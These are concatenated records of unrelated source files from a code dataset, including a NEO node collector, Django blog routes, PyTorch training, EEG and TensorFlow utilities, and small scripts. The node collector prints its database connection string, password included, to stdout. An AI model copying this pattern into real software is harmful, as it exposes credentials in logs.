{"seq_id":"278380729","text":"import psycopg2\nimport requests\nimport json\nimport time\nimport socket\nimport dns.resolver\nimport os\n\nresolver = dns.resolver.Resolver(configure=False)\nresolver.nameservers = [\"208.67.222.222\", \"208.67.220.220\", '8.8.8.8', '2001:4860:4860::8888',\n '8.8.4.4', '2001:4860:4860::8844']\n\nhost = str(os.environ['PGHOST'])\ndatabasename = str(os.environ['PGDATABASE'])\nuser = str(os.environ['PGUSER'])\npassword = str(os.environ['PGPASSWORD'])\n\nconnection_str = \"dbname='{}' user='{}' host='{}' password='{}'\".format(\n databasename, user, host, password)\n# connection_str = \"dbname='{}' user='{}' host='localhost' password='{}'\".format(\n# databasename, user, host, password)\n\nprint(connection_str)\n\ndef get_coz_mainnet_json():\n r = requests.get(\n 'https://raw.githubusercontent.com/CityOfZion/neo-mon/master/docs/assets/mainnet.json')\n return json.loads(r.text)\n\ndef get_existing_nodes(cursor):\n # For mainnet json, we use hostname to check whether a node\n # exists in our database, since there is a chance\n # that a node has multiple IPs for load-balancing\n nodes_dict = {}\n cursor.execute(\"select id, hostname, ip from nodes\")\n results = cursor.fetchall()\n\n for id, hostname, ip in results:\n nodes_dict[hostname] = (id, hostname, ip)\n\n return nodes_dict\n\ndef get_existing_connections(cursor):\n connections_dict = {}\n cursor.execute(\"select id, hostname, node_id, protocol, port from connection_endpoints\")\n\n results = cursor.fetchall()\n\n for id, hostname, node_id, protocol, port in results:\n connections_dict[hostname] = (id, hostname, node_id, protocol, port)\n\n return connections_dict\n\n\ndef create_or_update_nodes_rows(cursor, data):\n key = 0\n for endpoint in data[\"sites\"]:\n if endpoint[\"type\"] == \"RPC\":\n hostname = endpoint[\"url\"].split(\"//\")[-1].split(\":\")[0]\n ip = socket.gethostbyname(hostname)  # resolve the bare hostname; the full URL is not a valid DNS name\n\n nodes_dict = get_existing_nodes(cursor)\n \n if hostname not in nodes_dict:\n # add new rows in nodes\n print(\"insert new rows into nodes table. hostname: {} ip: {}\".format(hostname, ip))\n cursor.execute(\n \"INSERT INTO nodes (hostname, ip) VALUES (%s, %s)\", [hostname, ip])\n else:\n (id, hostnameFromDatabase, ipFromDatabase) = nodes_dict[hostname]\n\n if ipFromDatabase != ip:\n # IP has changed; some nodes use load balancing and change their IP all the time\n print(\"update node's ip. 
hostname: {} id: {} ipFromDatabase: {} ip:{}\".format(hostname, id, ipFromDatabase, ip))\n cursor.execute(\"UPDATE nodes SET ip=%s WHERE id=%s;\", [ip, id])\n \ndef check_mainnet_json(data):\n # Check that the mainnet json has the expected keys and structure\n if \"sites\" not in data or \"name\" not in data or \"pollTime\" not in data:\n return False\n \n for site in data[\"sites\"]:\n if \"url\" not in site or \"locale\" not in site or \"location\" not in site or \"type\" not in site:\n return False\n return True\n\ndef create_connectionendpoints_rows(cursor, data):\n key = 0\n for endpoint in data[\"sites\"]:\n if endpoint[\"type\"] == \"RPC\":\n hostname = endpoint[\"url\"].split(\"//\")[-1].split(\":\")[0]\n ip = socket.gethostbyname(hostname)  # resolve the bare hostname, as above\n\n nodes_dict = get_existing_nodes(cursor)\n\n (node_id, hostnameFromDatabase, ipFromDatabase) = nodes_dict[hostname]\n\n protocol = endpoint[\"protocol\"]\n port = endpoint[\"port\"] if \"port\" in endpoint else 10332\n\n cursor.execute(\"SELECT id, node_id, protocol, port FROM public.connection_endpoints where node_id=%s and protocol=%s and port=%s\", [int(node_id), str(protocol), int(port)])\n\n rows = cursor.fetchall()\n\n if len(rows) == 0:\n # this connection endpoint does not exist in the database\n print(\"insert into connection endpoints, hostname:{} node_id: {} protocol: {} port: {}\".format(hostname, int(node_id), str(protocol), int(port)))\n cursor.execute(\"INSERT INTO public.connection_endpoints (node_id, protocol, port) VALUES (%s, %s, %s) RETURNING id\", [int(node_id), str(protocol), int(port)])\n\n lastid = cursor.fetchone()[0]\n\n cursor.execute(\"INSERT INTO locale (connection_id, locale) VALUES (%s, %s)\", [\n lastid, endpoint[\"locale\"]])\n cursor.execute(\"INSERT INTO location (connection_id, location) VALUES (%s, %s)\", [\n lastid, endpoint[\"location\"]])\n\n response = requests.get(\"https://geoip.nekudo.com/api/\"+ip)\n json_data = json.loads(response.text)\n\n lat = json_data[\"location\"]['latitude']\n long = json_data[\"location\"]['longitude']\n\n cursor.execute(\"INSERT INTO coordinates (connection_id, lat, long) VALUES (%s, %s, %s)\", [lastid, lat, long])\n \nif __name__ == \"__main__\":\n while True:\n connect_str = connection_str\n\n conn = psycopg2.connect(connect_str)\n\n cursor = conn.cursor()\n\n data = get_coz_mainnet_json()\n\n if check_mainnet_json(data):\n create_or_update_nodes_rows(cursor, data)\n conn.commit()\n\n create_connectionendpoints_rows(cursor, data)\n conn.commit()\n\n cursor.close()\n conn.close()\n else:\n raise ValueError(\"mainnet.json file is not in the right format\")\n\n\n # sleep for a day\n time.sleep(60*60*24)\n\n\n","sub_path":"neo-collector/create/createOrUpdatePrimaryTables.py","file_name":"createOrUpdatePrimaryTables.py","file_ext":"py","file_size_in_byte":5731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"31625205","text":"#-*- coding:utf-8 -*-\nfrom django.conf.urls import *\nfrom blog.views import *\nfrom blog.models import LatestArticlesFeed\nfrom django.contrib import admin\nadmin.autodiscover()\n\n# NOTE: the <name> part of each (?P<name>...) group below was lost during\n# extraction; the group names used here are reconstructed guesses.\nurlpatterns = patterns('',\n (r'^$', home),\n (r'^category/(?P<category>.+)/$', home),\n (r'^archive/(?P<archive>.+)/$', home),\n (r'^tag/(?P<tag>.+)/$', home),\n (r'^article/(?P<article_id>\\d+)/$', detail),\n (r'^comment/(?P<comment_id>\\d+)/$', comment),\n (r'^fvck@dm!n/', include(admin.site.urls)),\n (r\"^feeds/$\", LatestArticlesFeed()),\n (r\"^pre-view/$\", pre_view),\n (r\"^resume/$\", resume),\n (r\"^today-visitors/$\", today_visitors),\n 
(r\"^online-visitors/$\", online_visitors),\n (r\"^visit-count/$\", visit_count),\n (r\"^alipay/$\", alipay),\n (r\"^auth-xss/$\", auth_xss),\n )\n","sub_path":"ashin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1108,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"232171644","text":"import os\nimport sys\nimport warnings\n\nBASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\nsys.path.append(BASE_DIR)\nwarnings.filterwarnings('ignore')\n\nimport argparse\nimport functools\nimport time\n\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom simpleAICV.segmentation.common import SegmentationCollater\n\nfrom tools.scripts import train_segmentation, compute_segmentation_test_loss\nfrom tools.utils import (get_logger, set_seed, worker_seed_init_fn,\n compute_flops_and_params, build_optimizer,\n build_scheduler, build_training_mode)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser(\n description='PyTorch Detection Model Training')\n parser.add_argument(\n '--work-dir',\n type=str,\n help='path for get training config and saving log/models')\n parser.add_argument(\n '--local_rank',\n type=int,\n default=0,\n help='LOCAL_PROCESS_RANK in DistributedDataParallel model')\n\n return parser.parse_args()\n\n\ndef main():\n assert torch.cuda.is_available(), 'need gpu to train network!'\n torch.cuda.empty_cache()\n\n args = parse_args()\n sys.path.append(args.work_dir)\n from train_config import config\n log_dir = os.path.join(args.work_dir, 'log')\n checkpoint_dir = os.path.join(args.work_dir, 'checkpoints')\n resume_model = os.path.join(checkpoint_dir, 'latest.pth')\n\n if not os.path.exists(checkpoint_dir):\n os.makedirs(checkpoint_dir)\n\n global logger\n logger = get_logger('train', log_dir)\n\n set_seed(config.seed)\n\n local_rank = args.local_rank\n # start init process\n if config.distributed:\n torch.distributed.init_process_group(backend='nccl',\n init_method='env://')\n torch.cuda.set_device(local_rank)\n\n init_fn = functools.partial(worker_seed_init_fn,\n num_workers=config.num_workers,\n local_rank=local_rank,\n seed=config.seed)\n train_sampler = torch.utils.data.distributed.DistributedSampler(\n config.train_dataset, shuffle=True) if config.distributed else None\n collater = SegmentationCollater()\n train_loader = DataLoader(config.train_dataset,\n batch_size=config.batch_size,\n shuffle=(train_sampler is None),\n pin_memory=True,\n num_workers=config.num_workers,\n collate_fn=collater.next,\n sampler=train_sampler,\n worker_init_fn=init_fn)\n val_sampler = torch.utils.data.distributed.DistributedSampler(\n config.val_dataset, shuffle=False) if config.distributed else None\n val_loader = DataLoader(config.val_dataset,\n batch_size=config.batch_size,\n shuffle=False,\n pin_memory=True,\n num_workers=config.num_workers,\n collate_fn=collater.next,\n sampler=val_sampler)\n\n for key, value in config.__dict__.items():\n if not key.startswith('__'):\n if key not in [\n 'model', 'criterion', 'decoder', 'train_dataset',\n 'val_dataset'\n ]:\n log_info = f'{key}: {value}'\n logger.info(log_info) if (\n config.distributed\n and local_rank == 0) or not config.distributed else None\n\n gpus_type, gpus_num = torch.cuda.get_device_name(\n ), torch.cuda.device_count()\n log_info = f'gpus_type: {gpus_type}, gpus_num: {gpus_num}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n model = config.model.cuda()\n criterion = 
config.criterion.cuda()\n decoder = config.decoder.cuda()\n\n # parameters needs to be updated by the optimizer\n # buffers doesn't needs to be updated by the optimizer\n for name, param in model.named_parameters():\n log_info = f'name: {name}, grad: {param.requires_grad}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n for name, buffer in model.named_buffers():\n log_info = f'name: {name}, grad: {buffer.requires_grad}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n optimizer = build_optimizer(config, model)\n scheduler = build_scheduler(config, optimizer)\n model = build_training_mode(config, model, optimizer)\n\n start_epoch = 1\n # automatically resume model for training if checkpoint model exist\n if os.path.exists(resume_model):\n checkpoint = torch.load(resume_model, map_location=torch.device('cpu'))\n model.load_state_dict(checkpoint['model_state_dict'])\n optimizer.load_state_dict(checkpoint['optimizer_state_dict'])\n scheduler.load_state_dict(checkpoint['scheduler_state_dict'])\n saved_epoch = checkpoint['epoch']\n start_epoch += saved_epoch\n test_loss, lr = checkpoint['test_loss'], checkpoint['lr']\n\n log_info = f'resuming model from {resume_model}. resume_epoch: {saved_epoch}, test_loss: {test_loss:.4f}, lr: {lr:.6f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n # calculate training time\n start_time = time.time()\n best_test_loss = 100000000.\n\n for epoch in range(start_epoch, config.epochs + 1):\n torch.cuda.empty_cache()\n train_sampler.set_epoch(epoch) if config.distributed else None\n loss = train_segmentation(train_loader, model, criterion, optimizer,\n scheduler, epoch, logger, config)\n log_info = f'train: epoch {epoch:0>3d}, total_loss: {loss:.4f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n test_loss = None\n if epoch in config.eval_epoch or epoch == config.epochs:\n test_loss = compute_segmentation_test_loss(val_loader, model,\n criterion)\n log_info = f'eval: epoch: {epoch:0>3d}, test_loss: {test_loss:.4f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n if (config.distributed and local_rank == 0) or not config.distributed:\n # save best test loss model and each epoch checkpoint\n if test_loss and test_loss < best_test_loss:\n torch.save(model.module.state_dict(),\n os.path.join(checkpoint_dir, 'best.pth'))\n best_test_loss = test_loss\n\n torch.save(\n {\n 'epoch': epoch,\n 'test_loss': best_test_loss,\n 'lr': scheduler.get_lr()[0],\n 'model_state_dict': model.state_dict(),\n 'optimizer_state_dict': optimizer.state_dict(),\n 'scheduler_state_dict': scheduler.state_dict(),\n }, os.path.join(checkpoint_dir, 'latest.pth'))\n\n if (config.distributed and local_rank == 0) or not config.distributed:\n if os.path.exists(os.path.join(checkpoint_dir, 'best.pth')):\n os.rename(\n os.path.join(checkpoint_dir, 'best.pth'),\n os.path.join(\n checkpoint_dir,\n f'{config.network}-epoch{epoch}-best_test_loss{best_test_loss:.3f}.pth'\n ))\n\n training_time = (time.time() - start_time) / 3600\n flops, params = compute_flops_and_params(config, model)\n log_info = f'train done. 
model: {config.network}, flops: {flops}, params: {params}, training time: {training_time:.3f} hours, best_test_loss: {best_test_loss:.3f}'\n logger.info(log_info) if (config.distributed and local_rank\n == 0) or not config.distributed else None\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"tools/train_segmentation_model.py","file_name":"train_segmentation_model.py","file_ext":"py","file_size_in_byte":8389,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"78410695","text":"import os\nimport numpy as np\nimport h5py\nimport matplotlib.pyplot as plt\n\nsource_path = '/gpfs/exfel/data/user/juncheng/crystalProject/data/simulation/source'\nsource_name = 'g8_0kev.h5'\ndest_name = source_name\n#dest_name = os.path.basename(source_name)+'-t.h5'\nos.chdir(source_path)\n#copyfile(source_name, dest_name)\n\n\ndef checkNval(source_name): \n with h5py.File(source_name,'r') as f:\n print ('arrEhor Shape:', f['data/arrEhor'].shape)\n print ('nVal =',f['params/nval'][...])\n f.close()\n\ndef figProj(data,extent):\n # extent = [xMin, xMax, yMin, yMax]\n figure = plt.figure(figsize=(10, 10), dpi=100)\n plt.axis('tight')\n profile = plt.subplot2grid((3, 3), (1, 0), colspan=2, rowspan=2)\n profile.imshow(data, extent=extent)\n\n x = np.linspace(extent[0],extent[1],data.shape[1])\n y = np.linspace(extent[2],extent[3],data.shape[0])\n\n # x-projection plots above main plot.\n x_projection = plt.subplot2grid((3, 3), (0, 0), sharex=profile, colspan=2)\n x_projection.plot(x, np.sum(data,axis=0), label='x projection')\n # y-projection plot right of main plot.\n y_projection = plt.subplot2grid((3, 3), (1, 2), rowspan=2, sharey=profile)\n y_projection.plot(np.sum(data,axis=1), y, label='y projection')  # sum over columns so the profile has len(y)\n plt.minorticks_off()\n profile.set_xlim([extent[0], extent[1]])\n profile.set_ylim([extent[2], extent[3]])\n\n return (figure,profile,x_projection,y_projection)\n\n\n#%%\n# Create .h5 file\nwith h5py.File(dest_name, 'a') as f:\n try: \n del f['/params/wEFieldUnit']\n except KeyError:  # key may not exist yet\n pass\n dt = h5py.string_dtype(encoding='ascii')\n f.create_dataset('/params/wEFieldUnit',(1,), dtype=dt, data='sqrt(W/mm^2)')\n f.flush()\n f.close()\n","sub_path":"src/controller/singFEL/sourceUnit.py","file_name":"sourceUnit.py","file_ext":"py","file_size_in_byte":1713,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"211847342","text":"# -*- coding: utf-8 -*-\n#\n# Authors: Swolf \n# Date: 2021/1/07\n# License: MIT License\nimport warnings  # sign_flip below calls warnings.warn\nfrom typing import Optional, List, Tuple\n\nimport numpy as np\nfrom numpy import ndarray\nfrom scipy.linalg import solve\nfrom scipy.signal import sosfiltfilt, cheby2, cheb2ord, cheby1, cheb1ord\nfrom sklearn.base import BaseEstimator, TransformerMixin, clone\n\ndef robust_pattern(W: ndarray, Cx: ndarray, Cs: ndarray) -> ndarray:\n \"\"\"Transform spatial filters to spatial patterns based on paper [1]_.\n\n Parameters\n ----------\n W : ndarray\n Spatial filters, shape (n_channels, n_filters).\n Cx : ndarray\n Covariance matrix of eeg data, shape (n_channels, n_channels).\n Cs : ndarray\n Covariance matrix of source data, shape (n_channels, n_channels).\n\n Returns\n -------\n A : ndarray\n Spatial patterns, shape (n_channels, n_patterns), each column is a spatial pattern.\n\n References\n ----------\n .. [1] Haufe, Stefan, et al. 
\"On the interpretation of weight vectors of linear models in multivariate neuroimaging.\" Neuroimage 87 (2014): 96-110.\n \"\"\"\n # use linalg.solve instead of inv, makes it more stable\n # see https://github.com/robintibor/fbcsp/blob/master/fbcsp/signalproc.py\n # and https://ww2.mathworks.cn/help/matlab/ref/mldivide.html\n A = solve(Cs.T, np.dot(Cx, W).T).T\n return A \n\nclass FilterBank(BaseEstimator, TransformerMixin):\n def __init__(self, base_estimator: Optional[BaseEstimator] = None,\n filterbank: Optional[List[ndarray]] = None):\n self.base_estimator = base_estimator\n self.filterbank = filterbank\n\n def fit(self, X: ndarray, y: ndarray):\n # transform filterbank\n X = self.transform_filterbank(X)\n self.estimators_ = [\n clone(self.base_estimator) for _ in range(len(X))]\n for i, estimator in enumerate(self.estimators_):\n estimator.fit(X[i], y)\n return self\n\n def transform(self, X: ndarray):\n X = self.transform_filterbank(X)\n features = np.concatenate(\n [est.transform(X[i]) for i, est in enumerate(self.estimators_)], axis=-1)\n return features\n\n def _check_filterbank(self):\n if hasattr(self, 'filterbank') and isinstance(self.filterbank, list):\n if self.filterbank[0].ndim != 2 or self.filterbank[0].shape[1] != 6:\n raise ValueError(\"only sos coefficients supported.\")\n return True\n return False\n\n def transform_filterbank(self, X: ndarray):\n if self._check_filterbank():\n Xs = np.stack([sosfiltfilt(sos, X, axis=-1) for sos in self.filterbank])\n return Xs\n else:\n return X[np.newaxis, ...]\n\ndef generate_filterbank(\n passbands: List[Tuple[float, float]],\n stopbands: List[Tuple[float, float]],\n srate: int):\n filterbank = []\n for wp, ws in zip(passbands, stopbands):\n # N, wn = cheb2ord(wp, ws, 3, 40, fs=srate)\n # sos = cheby2(N, 0.5, wn, btype='bandpass', output='sos', fs=srate)\n N, wn = cheb1ord(wp, ws, 3, 40, fs=srate)\n sos = cheby1(N, 0.5, wn, btype='bandpass', output='sos', fs=srate)\n\n filterbank.append(sos)\n return filterbank\n\ndef generate_cca_references(freqs, srate, T, \n phases: Optional[ndarray] = None,\n n_harmonics: int = 1):\n if isinstance(freqs, int) or isinstance(freqs, float):\n freqs = [freqs] \n freqs = np.array(freqs)[:, np.newaxis]\n if phases is None:\n phases = 0\n if isinstance(phases, int) or isinstance(phases, float):\n phases = [phases] \n phases = np.array(phases)[:, np.newaxis]\n t = np.linspace(0, T, int(T*srate))\n\n Yf = []\n for i in range(n_harmonics):\n Yf.append(np.stack([\n np.sin(2*np.pi*(i+1)*freqs*t + np.pi*phases),\n np.cos(2*np.pi*(i+1)*freqs*t + np.pi*phases)], axis=1))\n Yf = np.concatenate(Yf, axis=1)\n return Yf\n\ndef sign_flip(u, s, vh=None):\n \"\"\"Flip signs of SVD or EIG using the method in paper [1]_.\n\n Parameters\n ----------\n u: ndarray\n left singular vectors, shape (M, K).\n s: ndarray\n singular values, shape (K,).\n vh: ndarray or None\n transpose of right singular vectors, shape (K, N).\n\n Returns\n -------\n u: ndarray\n corrected left singular vectors.\n s: ndarray\n singular values.\n vh: ndarray\n transpose of corrected right singular vectors.\n\n References\n ----------\n .. 
[1] https://www.sandia.gov/~tgkolda/pubs/pubfiles/SAND2007-6422.pdf\n \"\"\"\n if vh is None:\n total_proj = np.sum(u*s, axis=0)\n signs = np.sign(total_proj)\n \n random_idx = (signs==0)\n if np.any(random_idx):\n signs[random_idx] = 1\n warnings.warn(\"The magnitude is close to zero, the sign will become arbitrary.\")\n \n u = u*signs\n \n return u, s\n else:\n left_proj = np.sum(s[:, np.newaxis]*vh, axis=-1)\n right_proj = np.sum(u*s, axis=0)\n total_proj = left_proj + right_proj\n signs = np.sign(total_proj)\n \n random_idx = (signs==0)\n if np.any(random_idx):\n signs[random_idx] = 1\n warnings.warn(\"The magnitude is close to zero, the sign will become arbitrary.\")\n\n u = u*signs\n vh = signs[:, np.newaxis]*vh\n\n return u, s, vh\n\n\n \n","sub_path":"brainda/algorithms/decomposition/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":5420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"}
{"seq_id":"595603103","text":"# Copyright 2019 The TensorFlow Hub Authors. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Utils for module search functionality.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport tensorflow_datasets as tfds\n\n\ndef compute_distance_matrix(x_train, x_test, measure=\"squared_l2\"):\n \"\"\"Calculates the distance matrix between test and train.\n\n Args:\n x_train: Matrix (NxD) where each row represents a training sample\n x_test: Matrix (MxD) where each row represents a test sample\n measure: Distance measure (not necessarily metric) to use\n\n Raises:\n NotImplementedError: When the measure is not implemented\n\n Returns:\n Matrix (MxN) where element i,j is the distance between\n x_test_i and x_train_j.\n \"\"\"\n\n x_train = tf.convert_to_tensor(x_train, tf.float64)\n x_test = tf.convert_to_tensor(x_test, tf.float64)\n\n if measure == \"squared_l2\":\n x_xt = tf.matmul(x_test, tf.transpose(x_train)).numpy()\n\n x_train_2 = tf.reduce_sum(tf.math.square(x_train), 1).numpy()\n x_test_2 = tf.reduce_sum(tf.math.square(x_test), 1).numpy()\n\n for i in range(np.shape(x_xt)[0]):\n x_xt[i, :] = np.multiply(x_xt[i, :], -2)\n x_xt[i, :] = np.add(x_xt[i, :], x_test_2[i])\n x_xt[i, :] = np.add(x_xt[i, :], x_train_2)\n\n else:\n raise NotImplementedError(\"Method '{}' is not implemented\".format(measure))\n\n return x_xt\n\n\ndef compute_distance_matrix_loo(x, measure=\"squared_l2\"):\n \"\"\"Calculates the distance matrix for leave-one-out strategy.\n\n Args:\n x: Matrix (NxD) where each row represents a sample\n measure: Distance measure (not necessarily metric) to use\n\n Raises:\n NotImplementedError: When the measure is not implemented\n\n Returns:\n Matrix (NxN) where element i,j is the distance between x_i and x_j.\n The diagonal is set to infinity\n 
\"\"\"\n\n x = tf.convert_to_tensor(x, tf.float64)\n\n if measure == \"squared_l2\":\n x_xt = tf.matmul(x, tf.transpose(x)).numpy()\n diag = np.diag(x_xt)\n d = np.copy(x_xt)\n\n for i in range(np.shape(d)[0]):\n d[i, :] = np.multiply(d[i, :], -2)\n d[i, :] = np.add(d[i, :], x_xt[i, i])\n d[i, :] = np.add(d[i, :], diag)\n d[i, i] = float(\"inf\")\n\n elif measure == \"cosine\":\n d = tf.matmul(x, tf.transpose(x)).numpy()\n diag_sqrt = np.sqrt(np.diag(d))\n outer = np.outer(diag_sqrt, diag_sqrt)\n d = np.ones(np.shape(d)) - np.divide(d, outer)\n np.fill_diagonal(d, float(\"inf\"))\n\n else:\n raise NotImplementedError(\"Method '{}' is not implemented\".format(measure))\n\n return d\n\n\ndef knn_errorrate(d, y_train, y_test, k=1):\n \"\"\"Calculate the knn error rate based on the distance matrix d.\n\n Args:\n d: distance matrix\n y_train: label vector for the training samples\n y_test: label vector for the test samples\n k: number of direct neighbors for knn\n\n Returns:\n knn error rate (1 - accuracy)\n \"\"\"\n\n if k == 1:\n indices = np.argmin(d, axis=1)\n\n cnt = 0\n for i in range(len(indices)):\n if y_test[i] != y_train[indices[i]]:\n cnt += 1\n\n return float(cnt) / len(indices)\n\n indices = np.argpartition(d, k - 1, axis=1)\n cnt = 0\n for i in range(np.shape(d)[0]):\n cnt_i = 0\n for j in range(k):\n if y_test[i] != y_train[indices[i, j]]:\n cnt_i += 1\n if cnt_i >= k / 2.0:\n cnt += 1\n\n return float(cnt) / np.shape(d)[0]\n\n\ndef knn_errorrate_loo(d, y, k=1):\n \"\"\"Calculate the leave-one-out expected knn error rate based\n on the distance matrix d.\n\n Args:\n d: distance matrix, the diagonal should be infinity\n y: label matrix\n k: number of direct neighbors for knn\n\n Returns:\n Expected leave-one-out knn error rate (1 - accuracy)\n \"\"\"\n\n if k == 1:\n indices = np.argmin(d, axis=1)\n\n cnt = 0\n for i in range(len(indices)):\n if y[i] != y[indices[i]]:\n cnt += 1\n\n return float(cnt) / len(indices)\n\n indices = np.argpartition(d, k - 1, axis=1)\n cnt = 0\n for i in range(np.shape(d)[0]):\n cnt_i = 0\n for j in range(k):\n if y[i] != y[indices[i, j]]:\n cnt_i += 1\n if cnt_i >= k / 2.0:\n cnt += 1\n\n return float(cnt) / np.shape(d)[0]\n\n\ndef load_data(dataset, split, num_examples=None):\n ds = tfds.load(dataset, split=split, shuffle_files=False)\n if num_examples:\n ds = ds.take(num_examples)\n return ds\n\n\ndef load_embedding_fn(module):\n m = hub.load(module, tags=[])\n return lambda x: m.signatures[\"default\"](x)[\"default\"]\n","sub_path":"tensorflow_hub/tools/module_search/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":5104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"438428276","text":"#!/usr/bin/env python\n#\n# Example for using the Grove - LCD RGB Backlight\n#\n# You can learn more about LeMaker Guitar here: http://www.lemaker.org/cn/product-guitar-specification.html\n# Modules: \n# \thttp://www.seeedstudio.com/wiki/Grove_-_LCD_RGB_Backlight\n#\n# Have a question about this example? 
Ask on the forums here: http://forum.lemaker.org/cn/forum.php?gid=169 \n#\n# NOTE:\n# \tOnly supports setting the backlight colour and putting a text string onto the display\n\nfrom grove_rgb_lcd import *\nimport time\n\nsetRGB(0,255,0)\nbuf=list(\"Grove -Update without erase\")\nsetText(\"\".join(buf))\ntime.sleep(1)\n\nfor i in range(len(buf)):\n\tbuf[i]=\".\"\n\tsetText_norefresh(\"\".join(buf))\n\ttime.sleep(.1)\n","sub_path":"GroveOnGuitar/GroveOnGuitar/grove_rgb_lcd/example3.py","file_name":"example3.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"495315792","text":"class Solution:\n def findMedianSortedArrays(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: float\n \"\"\"\n newnum = nums1\n newnum.extend(nums2)\n newnum.sort()\n \n numLen = len(newnum)\n \n if numLen %2 == 0:\n median = (newnum[int(numLen/2)]+newnum[int((numLen/2)-1)])/2\n else:\n T = int(((numLen+1)/2)-1)\n median = newnum[T]\n \n return float(median)\n \n","sub_path":"MedianSortedArrays.py","file_name":"MedianSortedArrays.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"649314091","text":"#!/usr/bin/python\n# from setuptools\n# import setup\nimport os\n\n__author__ = \"Andre Christoga\"\ninput = raw_input(\"> (eg plus, minus, divide...)\")\n\nif input == \"plus\":\n\tos.system(\"pymain/plus.py\")\nif input == \"minus\":\n\tos.system(\"pymain/minus.py\")\nif input == \"multi\":\n\tos.system(\"pymain/multi.py\")\nif input == \"divide\":\n\tos.system(\"pymain/divide.py\")\nif input == \"modulos\":\n\tos.system(\"pymain/modulos.py\")\n\n# setup(\n# name=\"PyMaIn\",\n# version=\"1.0.0\",\n# author=\"Coding Smart School\",\n# author_email=\"codingsmartschool@gmail.com\",\n# url=\"https://github.com/codingsmartschool/pymain\",\n# description=\"Python Math Input\",\n# long_description=(\"PyMaIn is a python program that takes maths number\" \n# \" and give user the answer.\"),\n# classifiers=[\n# 'Development Status :: 4 - Beta',\n# 'Programming Language :: Python',\n# ],\n# license=\"MIT\",\n# packages=['pymain'],\n# )","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"24"} +{"seq_id":"613608299","text":"import math\nimport sys\n\n# define some colors\n# ------------------------------------------------------------------------------\nBLACK = '\\033[30m'\nRED = '\\033[31m'\nGREEN = '\\033[32m'\nYELLOW = '\\033[33m'\nBLUE = '\\033[34m'\nMAGENTA = '\\033[35m'\nCYAN = '\\033[36m'\nWHITE = '\\033[37m'\nBRIGHT_RED = '\\033[91m'\nBRIGHT_GREEN = '\\033[92m'\nBRIGHT_YELLOW = '\\033[93m'\nBRIGHT_BLUE = '\\033[94m'\nBRIGHT_MAGENTA = '\\033[95m'\nBRIGHT_CYAN = '\\033[96m'\nBRIGHT_WHITE = '\\033[97m'\nENDC = '\\033[0m'\n\n\n# ------------------------------------------------------------------------------\ndef display_progress(count, total, old_percent, width=50, completed_char=\"#\",\n empty_char=\".\"):\n \"\"\"\n Draws and updates ASCII progress bar on the stdout.\n\n :param count: The current count for our progress bar.\n :param total: The count at 100%.\n :param old_percent: The previous percent. Necessary to prevent updates if\n the percentage has not changed since the last call.\n :param width: How wide to draw the progress bar in characters. 
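Note that the median snippet above extends nums1 in place (newnum is only another name for the same list object). A non-mutating sketch of the same merge-and-index idea:

def find_median(nums1, nums2):
    merged = sorted(nums1 + nums2)  # concatenation copies; the inputs stay intact
    n = len(merged)
    mid = n // 2
    if n % 2 == 0:
        return (merged[mid - 1] + merged[mid]) / 2
    return float(merged[mid])

print(find_median([1, 3], [2]))      # 2.0
print(find_median([1, 2], [3, 4]))   # 2.5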
